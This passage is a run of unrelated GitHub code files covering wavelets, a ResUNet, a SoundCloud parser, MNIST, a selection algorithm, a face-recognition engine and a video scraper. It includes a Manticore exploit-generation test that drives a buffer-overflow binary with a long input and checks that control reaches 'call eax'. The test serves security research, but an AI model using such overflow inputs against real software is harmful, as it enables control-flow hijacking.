tf.nn.conv2d(LL_conv_lpf_tr, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\nLL_conv_lpf_lpf_tr = tf.transpose(LL_conv_lpf_lpf, perm=[0, 2, 1, 3])\n\nLH_conv_lpf = tf.nn.conv2d(LH_us_pad, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\nLH_conv_lpf_tr = tf.transpose(LH_conv_lpf, perm=[0, 2, 1, 3])\nLH_conv_lpf_hpf = tf.nn.conv2d(LH_conv_lpf_tr, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nLH_conv_lpf_hpf_tr = tf.transpose(LH_conv_lpf_hpf, perm=[0, 2, 1, 3])\n\nHL_conv_hpf = tf.nn.conv2d(HL_us_pad, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHL_conv_hpf_tr = tf.transpose(HL_conv_hpf, perm=[0, 2, 1, 3])\nHL_conv_hpf_lpf = tf.nn.conv2d(HL_conv_hpf_tr, db2_lpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHL_conv_hpf_lpf_tr = tf.transpose(HL_conv_hpf_lpf, perm=[0, 2, 1, 3])\n\nHH_conv_hpf = tf.nn.conv2d(HH_us_pad, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHH_conv_hpf_tr = tf.transpose(HH_conv_hpf, perm=[0, 2, 1, 3])\nHH_conv_hpf_hpf = tf.nn.conv2d(HH_conv_hpf_tr, db2_hpf, padding=padd_type, strides=[1, 1, 1, 1],)\nHH_conv_hpf_hpf_tr = tf.transpose(HH_conv_hpf_hpf, perm=[0, 2, 1, 3])\n\n\nLL_LH = tf.math.add(LL_conv_lpf_lpf_tr, LH_conv_lpf_hpf_tr)\nHL_HH = tf.math.add(HL_conv_hpf_lpf_tr, HH_conv_hpf_hpf_tr)\n\nres = tf.math.add(LL_LH,HL_HH)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n# with tf.Session() as sess:\n# # cA_Temp = sess.run(cA_Temp)\n# a_us_Temp = sess.run(conv_rows_lpf)\n# # a_us_TEMP = sess.run(a_us_assign)\n# pass\n# #\n\n# conv_rows_hpf = tf.nn.conv2d(\n# x, db2_hpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n#\n# conv_rows_lpf_ds = conv_rows_lpf[:, :, 1:w:2, :]\n# conv_rows_hpf_ds = conv_rows_hpf[:, :, 1:w:2, :]\n#\n#\n# conv_rows_lpf_ds_padd = tf.pad(conv_rows_lpf_ds, [[0, 0], [3, 3], [0, 0], [0, 0]], \"SYMMETRIC\")\n# conv_rows_hpf_ds_padd = tf.pad(conv_rows_lpf_ds, [[0, 0], [3, 3], [0, 0], [0, 0]], \"SYMMETRIC\")\n#\n# conv_rows_lpf_ds_padd = tf.transpose(conv_rows_lpf_ds_padd)\n# conv_rows_hpf_ds_padd = tf.transpose(conv_rows_hpf_ds_padd)\n#\n# conv_rows_lps_padd_conv_cols_lpf = tf.nn.conv2d(\n# conv_rows_lpf_ds_padd, db2_lpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n# conv_rows_lps_padd_conv_cols_hpf = tf.nn.conv2d(\n# conv_rows_lpf_ds_padd, db2_hpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n# conv_rows_hps_padd_conv_cols_lpf = tf.nn.conv2d(\n# conv_rows_hpf_ds_padd, db2_lpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n# 
conv_rows_hps_padd_conv_cols_hpf = tf.nn.conv2d(\n# conv_rows_hpf_ds_padd, db2_hpf, padding='VALID', strides=[1, 1, 1, 1],\n# )\n#\n# conv_rows_lps_padd_conv_cols_lpf = tf.transpose(conv_rows_lps_padd_conv_cols_lpf)\n# conv_rows_lps_padd_conv_cols_hpf = tf.transpose(conv_rows_lps_padd_conv_cols_hpf)\n# conv_rows_hps_padd_conv_cols_lpf = tf.transpose(conv_rows_hps_padd_conv_cols_lpf)\n# conv_rows_hps_padd_conv_cols_hpf = tf.transpose(conv_rows_hps_padd_conv_cols_hpf)\n#\n# conv_rows_lps_padd_conv_cols_lpf_ds = conv_rows_lps_padd_conv_cols_lpf[:, 1:h:2, :, :]\n# conv_rows_lps_padd_conv_cols_hpf_ds = conv_rows_lps_padd_conv_cols_hpf[:, 1:h:2, :, :]\n# conv_rows_hps_padd_conv_cols_lpf_ds = conv_rows_hps_padd_conv_cols_lpf[:, 1:h:2, :, :]\n# conv_rows_hps_padd_conv_cols_hpf_ds = conv_rows_hps_padd_conv_cols_hpf[:, 1:h:2, :, :]\n#\n# image_tensor_conv_rows_lpf = tf.image.convert_image_dtype(conv_rows_lpf[0, ..., 0], dtype=tf.float32)\n# image_tensor_conv_rows_hpf = tf.image.convert_image_dtype(conv_rows_hpf[0, ..., 0], dtype=tf.float32)\n#\n# image_tensor_conv_rows_lpf_ds = tf.image.convert_image_dtype(conv_rows_lpf_ds[0, ..., 0], dtype=tf.float32)\n# image_tensor_conv_rows_hpf_ds = tf.image.convert_image_dtype(conv_rows_hpf_ds[0, ..., 0], dtype=tf.float32)\n#\n# img_conv_rows_lps_padd_conv_cols_lpf_ds = tf.image.convert_image_dtype(conv_rows_lps_padd_conv_cols_lpf_ds[0, ..., 0], dtype=tf.float32)\n# img_conv_rows_lps_padd_conv_cols_hpf_ds = tf.image.convert_image_dtype(conv_rows_lps_padd_conv_cols_hpf_ds[0, ..., 0], dtype=tf.float32)\n# img_conv_rows_hps_padd_conv_cols_lpf_ds = tf.image.convert_image_dtype(conv_rows_hps_padd_conv_cols_lpf_ds[0, ..., 0], dtype=tf.float32)\n# img_conv_rows_hps_padd_conv_cols_hpf_ds = tf.image.convert_image_dtype(conv_rows_hps_padd_conv_cols_hpf_ds[0, ..., 0], dtype=tf.float32)\n#\n#\n# orig_iamge_padded = tf.image.convert_image_dtype(x[0, ..., 0], dtype=tf.uint8)\n# with tf.Session() as sess:\n# # print(sess.run(db2_lpf))\n# # print(sess.run(db2_hpf))\n# image_conv_rows_lpf = sess.run(image_tensor_conv_rows_lpf)\n# image_conv_rows_hpf = sess.run(image_tensor_conv_rows_hpf)\n# image_conv_rows_lpf_ds = sess.run(image_tensor_conv_rows_lpf_ds)\n# image_conv_rows_hpf_ds = sess.run(image_tensor_conv_rows_hpf_ds)\n#\n# LL = sess.run(img_conv_rows_lps_padd_conv_cols_lpf_ds)\n# LH = sess.run(img_conv_rows_lps_padd_conv_cols_hpf_ds)\n# HL = sess.run(img_conv_rows_hps_padd_conv_cols_lpf_ds)\n# HH = sess.run(img_conv_rows_hps_padd_conv_cols_hpf_ds)\n# orig_img_pad = sess.run(orig_iamge_padded)\n# pass\n\n# cv2.imshow(\"tf\", image)\n# cv2.waitKey(0)\n# LL = np.clip(LL,0,255)\n# LL = np.ceil(LL)\n# LL = LL.astype(\"uint8\")\n# with open(r\"D:\\TEMP\\LL_python.raw\", \"wb\") as outfile:\n# outfile.write(LL) # Write it\n","repo_name":"EziGo96/Wavelet_Face_Anti_spoofing","sub_path":"tensorflow-wavelets-main/Development/Scripts/idwt2d_db2.py","file_name":"idwt2d_db2.py","file_ext":"py","file_size_in_byte":9162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23004125568","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\n\nclass ResidualConv(nn.Module):\n def __init__(self, input_dim, output_dim, stride, padding):\n super(ResidualConv, self).__init__()\n\n self.conv_block = nn.Sequential(\n nn.BatchNorm2d(input_dim),\n nn.ReLU(),\n nn.Conv2d(\n input_dim, output_dim, kernel_size=3, stride=stride, padding=padding\n ),\n nn.BatchNorm2d(output_dim),\n nn.ReLU(),\n nn.Conv2d(output_dim, 
output_dim, kernel_size=3, padding=1),\n )\n self.conv_skip = nn.Sequential(\n nn.Conv2d(input_dim, output_dim, kernel_size=3, stride=stride, padding=1),\n nn.BatchNorm2d(output_dim),\n )\n\n def forward(self, x):\n\n return self.conv_block(x) + self.conv_skip(x)\n\n\nclass Upsample(nn.Module):\n def __init__(self, input_dim, output_dim, kernel, stride):\n super(Upsample, self).__init__()\n\n self.upsample = nn.ConvTranspose2d(\n input_dim, output_dim, kernel_size=kernel, stride=stride\n )\n\n def forward(self, x):\n return self.upsample(x)\n\n\n\nclass clsResUnet(nn.Module):\n def __init__(self, channel, n_classes=3, filters=[64, 128, 256, 512]):\n super(clsResUnet, self).__init__()\n self.n_classes = n_classes\n\n self.input_layer = nn.Sequential(\n nn.Conv2d(channel, filters[0], kernel_size=3, padding=1),\n nn.BatchNorm2d(filters[0]),\n nn.ReLU(),\n nn.Conv2d(filters[0], filters[0], kernel_size=3, padding=1),\n )\n self.input_skip = nn.Sequential(\n nn.Conv2d(channel, filters[0], kernel_size=3, padding=1)\n )\n\n self.residual_conv_1 = ResidualConv(filters[0], filters[1], 2, 1)\n self.residual_conv_2 = ResidualConv(filters[1], filters[2], 2, 1)\n\n self.bridge = ResidualConv(filters[2], filters[3], 2, 1)\n\n self.upsample_1 = Upsample(filters[3], filters[3], 2, 2)\n self.up_residual_conv1 = ResidualConv(filters[3] + filters[2], filters[2], 1, 1)\n\n self.upsample_2 = Upsample(filters[2], filters[2], 2, 2)\n self.up_residual_conv2 = ResidualConv(filters[2] + filters[1], filters[1], 1, 1)\n\n self.upsample_3 = Upsample(filters[1], filters[1], 2, 2)\n self.up_residual_conv3 = ResidualConv(filters[1] + filters[0], filters[0], 1, 1)\n\n self.output_layer = nn.Sequential(\n nn.Conv2d(filters[0], self.n_classes, 1, 1),\n nn.Sigmoid(),\n )\n\n self.linear = nn.Linear(512, self.n_classes)\n\n def forward(self, x):\n # Encode\n x1 = self.input_layer(x) + self.input_skip(x)\n x2 = self.residual_conv_1(x1)\n x3 = self.residual_conv_2(x2)\n # Bridge\n x4 = self.bridge(x3)\n #print(\"meddle shape: \", x4.shape)\n out_cls = F.avg_pool2d(x4, 64)\n #print(\"avg shape: \", out_cls.shape)\n out_cls = out_cls.view(out_cls.size(0), -1)\n #print(\"view shape: \", out_cls.shape)\n out_cls = self.linear(out_cls)\n #print(\"out_cls shape: \", out_cls.shape)\n\n # Decode\n x4 = self.upsample_1(x4)\n x5 = torch.cat([x4, x3], dim=1)\n\n x6 = self.up_residual_conv1(x5)\n\n x6 = self.upsample_2(x6)\n x7 = torch.cat([x6, x2], dim=1)\n\n x8 = self.up_residual_conv2(x7)\n\n x8 = self.upsample_3(x8)\n x9 = torch.cat([x8, x1], dim=1)\n\n x10 = self.up_residual_conv3(x9)\n\n output = self.output_layer(x10)\n if self.training:\n return output, out_cls\n else:\n for i in range(self.n_classes):\n output[:,i] = output[:,i] * out_cls[i]\n return output\n\n\nif __name__ == '__main__':\n import os\n os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n\n\n model = clsResUnet(3, 3).cuda()\n print(model)\n\n x = torch.randn((1, 3, 512, 512)).cuda()\n\n pred = model(x)\n\n print(pred.shape)","repo_name":"linzhenyuyuchen/semantic-segmentation","sub_path":"modeling/clsResUnet.py","file_name":"clsResUnet.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73942017122","text":"# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys # 文字を入力する時に使う\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport json\nfrom datetime import 
datetime\n\ndef soclParseJson(sound_list):\n    data_list = [] \n    for sound in sound_list:\n        sound_in = {} # collect this sound's info as a dict\n        \n        # get the uploader's name\n        name = sound.find(\"span\",class_=\"soundTitle__usernameText\").text\n        # print(str(name))\n        sound_in[\"name\"] = name.strip() # strip() removes surrounding whitespace and newlines\n        \n        # get the sound's title\n        title = sound.find(\"a\",class_=\"soundTitle__title\").find(\"span\").text\n        #print(str(title).encode('utf-8'))\n        # pull the title out of the specified tag & class\n        sound_in[\"title\"] = title.strip()\n        \n        # get the sound's link\n        link = sound.find(\"a\",class_=\"soundTitle__title\").get(\"href\")\n        # pull the href out of the specified tag & class\n        #print(str(link))\n        sound_in[\"link\"] = \"https://soundcloud.com\" + link\n        \n        # upload timestamp\n        uploadTime = sound.find(\"time\").get(\"datetime\")\n        #print(str(uploadTime))\n        sound_in[\"uploadTime\"] = uploadTime.strip()\n        \n        # time elapsed since posting\n        postedTime = sound.find(\"time\").get(\"title\")\n        #print(str(postedTime))\n        sound_in[\"postedTime\"] = postedTime.strip()\n        \n        # play count\n        if sound.find(\"li\", class_=\"sc-ministats-item\"):\n            plays = sound.find(\"li\", class_=\"sc-ministats-item\").get(\"title\")\n\n            sound_in[\"plays\"] = plays\n        else:\n            sound_in[\"plays\"] = u\"0 plays\"\n\n        # the sound's artwork image\n        imagetag = sound.find(\"span\",class_=\"image__full\").get(\"style\")\n        image = imagetag[imagetag.find(\"url(\")+4:imagetag.find(\");\")]\n        sound_in[\"image\"] = image\n        \n        # data_list =sound_in # collect one page's worth of results in data_list\n        data_list.append(sound_in)\n        # f.write(str(sound_in))\n\n    return data_list\n","repo_name":"ma2tani/socl-tracks-api","sub_path":"soclParseJson.py","file_name":"soclParseJson.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"526689884","text":"import os\nimport pandas as pd\n\nfrom modeling.supervised.data_cleaning import Text\nfrom modeling.supervised.model import NeuralNetwork\n\npath = '/Users/nkuzak003/Documents/data/personal/sentiment labelled sentences/'\n\ndf_list = []\nfor x in os.listdir(path):\n    if x[x.rfind('_')+1: x.find('.')] == 'labelled':\n        df = pd.read_csv(os.path.join(path, x), names=['sentence', 'label'], sep='\\t')\n        df['source'] = x[:x.find('_')] \n        df_list.append(df)\ndf = pd.concat(df_list)\n\nds = Text(df=df, feature_col='sentence', label_col='label')\nsave_path = '/Users/nkuzak003/Documents/personal/notebooks/test_data'\n\nds.train_fasttext(save_path)\n\nmodel = NeuralNetwork(ds)\nlayers = [30, 10]\nmodel.embedding_to_sequential(layers)\nmodel.train(validation_split=.2, epochs=10)\nmodel.evaluate()","repo_name":"nicokuzak/algos","sub_path":"modeling/supervised/text_sample.py","file_name":"text_sample.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"29227822418","text":"#!/usr/bin/env python\n# _*_ coding: UTF-8 _*_\n\"\"\"=================================================\n@Project -> File   : FDS -> demo.py\n@IDE    : PyCharm\n@Author : Aimee\n@Date   : 2020/5/18 14:44\n@Desc   :\n=================================================\"\"\"\nimport requests\nfrom lxml import etree\n\n\nclass Spider(object):\n    def start_request(self):\n        for i in range(1, 2):\n            response = requests.get(\"https://ibaotu.com/shipin/\")\n            html = etree.HTML(response.content.decode(\"utf-8\"))\n            self.xpath_data(html)\n\n    def xpath_data(self, html):\n        src_list = html.xpath('//div[@class=\"video-play\"]/video/@src')\n        tit_list = html.xpath('//span[@class=\"video-title\"]/text()')\n        for src, tit in zip(src_list[:2], tit_list[:2]):\n            
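# Only the first two matches are downloaded, presumably to keep the demo small.\n            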
url = \"http:\" + src\n            file_name = tit + \".mp4\"\n            response = requests.get(url)\n            print(\"Fetching file: \" + file_name)\n\n            # save the data\n            with open(\"video/{}\".format(file_name), \"wb\") as f:\n                f.write(response.content)\n\n\nif __name__ == '__main__':\n    er = Spider()\n    er.start_request()\n","repo_name":"Aimee888/python-20200413","sub_path":"20200518/包图网/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"11231913536","text":"import tensorflow as tf\r\n\r\nimport input_data\r\n\r\nlearning_rate = 0.01\r\ntraining_epochs = 25\r\nbatch_size = 100\r\ndisplay_step = 1\r\n\r\nmnist = input_data.read_data_sets(\"./MNIST_DATA\", one_hot=True)\r\n\r\n# tensorflow graph input\r\nX = tf.placeholder('float', [None, 784]) # mnist data image of shape 28 * 28 = 784\r\nY = tf.placeholder('float', [None, 10]) # 0-9 digits recognition => 10 classes\r\n\r\n# set model weights\r\nW = tf.Variable(tf.zeros([784, 10]))\r\nb = tf.Variable(tf.zeros([10]))\r\n\r\n# Our hypothesis\r\nactivation = tf.add(tf.matmul(X, W),b) # logits; softmax is applied inside the loss below\r\n\r\n# Cost function: cross entropy\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=activation, labels=Y))\r\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) # Adam optimizer (a gradient-descent variant)\r\n\r\n# Before starting, initialize the variables. We will `run` this first.\r\ninit = tf.global_variables_initializer()\r\n\r\n# Launch the graph.\r\nwith tf.Session() as sess:\r\n    sess.run(init)\r\n\r\n    # Training cycle\r\n    for epoch in range(training_epochs):\r\n        avg_cost = 0.\r\n        total_batch = int(mnist.train.num_examples/batch_size)\r\n\r\n        # Loop over all batches.\r\n        for step in range(total_batch):\r\n            batch_xs, batch_ys = mnist.train.next_batch(batch_size)\r\n\r\n            # Fit training using batch data\r\n\r\n            sess.run(optimizer, feed_dict={X: batch_xs, Y: batch_ys})\r\n\r\n            # Compute average loss\r\n            avg_cost += sess.run(cost, feed_dict={X: batch_xs, Y: batch_ys})/total_batch\r\n        # Display logs per epoch step\r\n        if epoch % display_step == 0:\r\n            print (\"Epoch:\", '%04d' %(epoch+1), \"cost=\", \"{:.9f}\".format(avg_cost))\r\n\r\n    print (\"Optimization Finished!\")\r\n\r\n    # Test model\r\n    correct_prediction = tf.equal(tf.argmax(activation, 1), tf.argmax(Y, 1))\r\n    # Calculate accuracy\r\n    accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\r\n    print (\"Accuracy:\", accuracy.eval({X: mnist.test.images, Y: mnist.test.labels}))","repo_name":"leejaymin/TensorFlowLecture","sub_path":"4.MNIST/SoftmaxClassificationMNIST.py","file_name":"SoftmaxClassificationMNIST.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"54"}
+{"seq_id":"41903382180","text":"def test():\n    from manticore.native import Manticore\n\n    if __name__ == \"__main__\":\n        import sys\n\n        prog = sys.argv[1]\n        params = sys.argv[2:]\n    else:\n        prog = \"test_exploit_generation_example/bof\"\n        params = [\"AAAAAAAAAAAAAAAAAAAAAAA\"]\n\n    m = Manticore(prog, params)\n    m.verbosity(2)\n    # 'trace' will contain the executed instructions\n    m.context[\"trace\"] = []\n\n    # None: The hook will be applied to all the instructions\n    @m.hook(None)\n    def record_trace(state):\n        pc = state.cpu.PC\n        ins = state.cpu.instruction\n        # Store the instruction\n        with m.locked_context() as c:\n            c[\"trace\"] += [pc]\n\n            # We work directly with the capstone instruction\n            c[\"last_ins\"] = 
\"%s %s\" % (ins.mnemonic, ins.op_str)\n # print(state.cpu)\n # print(state.mem)\n\n m.run()\n\n # Print number of instructions recorded and the last executed\n print(\"%d instructions are recorded\" % len(m.context[\"trace\"]))\n print(\"Last instruction executed:\")\n print(\"0x%x: %s\" % (m.context[\"trace\"][-1], m.context[\"last_ins\"]))\n\n assert m.context[\"last_ins\"] == \"call eax\"\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"stjordanis/manticore-examples","sub_path":"test_exploit_generation_example/test_record.py","file_name":"test_record.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"25531794831","text":"# CS325 - Group Assignment #1\n# Author: Francisco Bolanos, Jaehyung You\n# Date : Tue, October 10, 2017\n# Filename : select.py\n\nimport os\nimport struct\n\ndef get_m():\n with open('input.txt','rt') as f1:\n for line in f1:\n x = line.split(',')[0]\n return x\n\ndef get_n():\n with open('input.txt','rt') as f2:\n for line in f2:\n y = line.split(',')[1]\n return y\n\ndef get_k():\n with open('input.txt','rt') as f3:\n for line in f3:\n z = line.split(',')[2]\n return z\n\t\ndef write_to_output(number):\n\twith open('output.txt', 'w') as f4:\n\t\tf4.write(str(number))\n\n#it will give you an element to the specific index.\ndef getnum(index, filename):\n f = open(filename,'r')\n f.seek(4*index)\n return struct.unpack('>I',f.read(4))[0]\n\t\n#binary search. it will return the index of the element.\ndef binary_search(sizeArray, filename, number):\n\twhile sizeArray[1] > sizeArray[0]:\n\t\tmiddle = (sizeArray[1] + sizeArray[0])/2\n\t\tnumberAtIndex = getnum(middle, filename)\n\t\t\n\t\tif numberAtIndex == number:\n\t\t\treturn middle\n\t\tif numberAtIndex == getnum(sizeArray[1], filename):\n\t\t\treturn sizeArray[1]\n\t\t\n\t\tif (sizeArray[1] - sizeArray[0]) == 1:\n\t\t\tif number > getnum(sizeArray[1], filename):\n\t\t\t\treturn sizeArray[1]\n\t\t\tif numberAtIndex < number:\n\t\t\t\treturn sizeArray[0]\n\t\t\treturn sizeArray[0]-1\n\t\t\n\t\telif numberAtIndex < number:\n\t\t\tsizeArray[0] = middle\n\t\telif numberAtIndex > number:\n\t\t\tsizeArray[1] = middle\n\t\n\tif getnum(sizeArray[0], filename) <= number :\n\t\treturn sizeArray[0]\n\telse:\n\t\treturn -1\n\t\t\t\n#find the longest array so that we can find the middle number.\ndef LongestArray(sizes,m):\n\tlongArray = 0\n\tfor i in range(0,m):\n\t\ttemp = sizes[i]\n\t\tif temp > sizes[longArray]:\n\t\t\tlongArray = i\n\treturn longArray\n\t\n\t\t\t\ndef main():\n\tm = int(get_m())\n\tn = int(get_n())\n\tk = int(get_k())-1\n\t\n\t#create and truncate array to size K\n\tArraySize=[]\n\tSizesofArrays= []\n\t\n\tif k <= n-1:\n\t\tfor i in range(0,m):\t\t\n\t\t\tArraySize.append([0,k])\n\t\t\tSizesofArrays.append(k+1)\n\telse:\n\t\tfor i in range(0,m):\t\t\n\t\t\tArraySize.append([0,n-1])\n\t\t\tSizesofArrays.append(n)\n\n #if all the size of arrays is 1 or 0, x == false. 
Otherwise keep looping.\n\tx = True\n\twhile (x == True):\n\t\t#find largest size array\n\t\tindexLongArray = LongestArray(SizesofArrays,m)\n\t\t\n\t\t# pick middle element of longest array\n\t\tmiddleIndex = (ArraySize[indexLongArray][0] + ArraySize[indexLongArray][1]) / 2\n\t\tmiddNum = getnum(middleIndex, str(indexLongArray+1)+'.dat')\n\t\t\n\t\tBSearchIndex = []\n\t\tsumIndex = 0\n\t\tfor i in range(0,m):\n\t\t\tif -1 not in ArraySize[i]:\n\t\t\t\ttemp = [ArraySize[i][0], ArraySize[i][1]]\n\t\t\t\tindex = binary_search(ArraySize[i], str(i+1)+'.dat', middNum)\n\t\t\t\tBSearchIndex.append(index)\n\t\t\t\tArraySize[i] = [temp[0], temp[1]]\n\t\t\t\tif index >= ArraySize[i][0]:\n\t\t\t\t\tsumIndex += (index - ArraySize[i][0]) + 1\n\n\t\tif k < sumIndex:\n\t\t\tempty = 0\n\t\t\tfor i in range(0,m):\n\t\t\t\tp = i - empty\n\t\t\t\tif SizesofArrays[i] == 0:\n\t\t\t\t\tempty+=1\n\t\t\t\telse:\n\t\t\t\t\tif BSearchIndex[p] < ArraySize[i][0]:\n\t\t\t\t\t\tArraySize[i][0] = ArraySize[i][1] = -1\n\t\t\t\t\t\tSizesofArrays[i] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tArraySize[i][1] = BSearchIndex[p]\n\t\t\t\t\t\tSizesofArrays[i] = ArraySize[i][1] - ArraySize[i][0] + 1\n\t\telse:\n\t\t\tk = k - sumIndex\n\t\t\tempty = 0\n\t\t\tfor i in range(0,m):\n\t\t\t\tp = i - empty\n\t\t\t\tif SizesofArrays[i] == 0:\n\t\t\t\t\tempty+=1\n\t\t\t\telse:\n\t\t\t\t\tif BSearchIndex[p] != -1:\n\t\t\t\t\t\tif BSearchIndex[p]+1 > ArraySize[i][1]:\n\t\t\t\t\t\t\tArraySize[i][0] = ArraySize[i][1] = -1\n\t\t\t\t\t\t\tSizesofArrays[i] = 0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tArraySize[i][0] = BSearchIndex[p]+1\n\t\t\t\t\t\t\tSizesofArrays[i] = ArraySize[i][1] - ArraySize[i][0]+1\n\t\t\n\t\tx = False\n\t\tfor i in SizesofArrays:\n\t\t\tif i > 1:\n\t\t\t\tx = True\n\n\tfinalArray = []\n\tfor i in range(0,m):\n\t\tif SizesofArrays[i] != 0:\n\t\t\tfinalArray.append(getnum(ArraySize[i][0], str(i+1)+'.dat'))\n\t\n\tfinalArray.sort()\n\twrite_to_output(finalArray[k])\n\t\t\n\t\t\n\t\n\t\t\t\nmain()\n","repo_name":"IamEricYou/CS325","sub_path":"GA1/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37609066246","text":"# 1. Write a Python program find a list of integers with exactly two occurrences of\n# nineteen and at least three occurrences of five. 
\n# Input:\n# [19, 19, 15, 5, 3, 5, 5, 2]\n# Output:\n# True\n# Input:\n# [19, 15, 15, 5, 3, 3, 5, 2]\n# Output:\n# False\n# Input:\n# [19, 19, 5, 5, 5, 5, 5]\n# Output:\n# True\n\na = [19, 19, 15, 5, 3, 5, 5, 2]\nb = [19, 15, 15, 5, 3, 3, 5, 2]\nc = [19, 19, 5, 5, 5, 5, 5]\n\n# First solution\ndef check_num(int_list):\n    nineteens = 0\n    fives = 0\n    for n in int_list:\n        if n == 19:\n            nineteens += 1\n        elif n == 5:\n            fives += 1\n    # exactly two 19s and at least three 5s, per the problem statement\n    return nineteens == 2 and fives >= 3\n\nprint(check_num(a))\nprint(check_num(b))\nprint(check_num(c))\nprint('\\n')\n\n\n# Second solution\ndef check_num_with_method(int_list):\n    return int_list.count(19) == 2 and int_list.count(5) >= 3\n\nprint(check_num_with_method(a))\nprint(check_num_with_method(b))\nprint(check_num_with_method(c))\n\n\n\n\n\n\n\n\n","repo_name":"mirshoddev99/Problems-Patterns","sub_path":"Python-100-Exercise/solutions/1-10/1_prob.py","file_name":"1_prob.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"1285291400","text":"\nimport pickle\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import *\nimport sklearn\nimport re\nfrom scipy.spatial import distance\nfrom skimage.transform import resize\nimport subprocess\n\nfrom sklearn.svm import SVC\nfrom scipy import misc\n\nimport cv2\nimport dlib\nimport tensorflow as tf\n\nimport mxnet as mx\nfrom align_dlib import *\n\nnp.random.seed(10)\n\nimport tensorflow as tf\nif tf.__version__ == '2.0.0-alpha0':\n    coreModel = tf.keras.models.load_model(\"./models/facenet_512.h5\")\nelse:\n    import keras\n    coreModel = keras.models.load_model(\"./models/facenet_512_tf1.h5\", custom_objects={'tf': tf})\nDISTANCE_THRESHOLD = 0.4\nfinal_img_size = 160\n\"\"\"\nfrom ArcFace import *\ncoreModel = ArcFace('./models/arcface')\nDISTANCE_THRESHOLD = 0.46\nfinal_img_size = 112\n\"\"\"\n\ndef to_rgb(img):\n    if img.ndim == 2:\n        w, h = img.shape\n        ret = np.empty((w, h, 3), dtype=img.dtype)\n        ret[:, :, 0] = ret[:, :, 1] = ret[:, :, 2] = img\n        return ret\n    elif img.shape[2] == 3:\n        return img\n    elif img.shape[2] == 4:\n        w, h, t = img.shape\n        ret = np.empty((w, h, 3), dtype=img.dtype)\n        # ret[:, :, 0] = ret[:, :, 1] = ret[:, :, 2] = img\n        return img[:, :, :3]\n\nclass AIengine:\n    def __init__(self, modelpath='./models', create=False):\n        try:\n            self.modelpath = modelpath\n            classifier = modelpath + \"/model.pkl\"\n            meta = modelpath + \"/model.meta\"\n            self.clfMap = {'img': self.classifyImg, 'vec': self.classifyVec}\n            self.fitMap = {'img': self.fitImg, 'vec': self.fitVec}\n            print(classifier)\n            if create:\n                print(\"Creating new AI Engine\")\n                # We need to create this AI engine and save it on disk\n                self.classifier = SVC(kernel='linear', probability=True)\n\n                self.labelEncodeMap = dict()  # Contains mapping from id string to hash\n                # self.metadata['labelDecodeMap'] # Contains mapping from hash to id string\n                self.labelDecodeMap = dict()\n\n                self.image_size = 160\n                self.margin = 1.1\n\n                subprocess.getoutput(\"mkdir \" + modelpath)\n                self.save(modelpath)\n            else:\n                if (\"No such file or directory\" in (subprocess.getoutput(\"ls \" + modelpath))):\n                    # __init__ must not return a value; raise instead of returning a string\n                    raise FileNotFoundError(\"AI Engine not created yet!\")\n                print(\"Loading AI Engine\")\n                try:\n                    self.classifier = pickle.loads(open(classifier, 'rb').read())\n                except Exception as e:\n                    print(e)\n                    print(\"Seems like the classifier was not found/is corrupt. Would make a new one for you\")\n                    
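# Fall back to a fresh, untrained classifier; fit() must run before classify() can work.\n                    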
self.classifier = SVC(kernel='linear', probability=True)\n                self.metadata = pickle.loads(open(meta, 'rb').read())\n\n                # Contains mapping from id string to hash\n                self.labelEncodeMap = dict(self.metadata['labelEncodeMap'])\n                # self.metadata['labelDecodeMap'] # Contains mapping from hash to id string\n                self.labelDecodeMap = {value: key for key,\n                               value in self.labelEncodeMap.items()}\n\n                self.image_size = self.metadata['imagesize'] # 160\n                self.margin = self.metadata['similarity_margin'] # 1.1\n        except Exception as e:\n            print(\"Error in AIengine.init\")\n            print(e)\n            return None\n    def embed(self, images, preprocess=False, detections=False):\n        try:\n            status = True\n            if preprocess is True:\n                images, status = self.preprocess(images, 10)\n            emb = 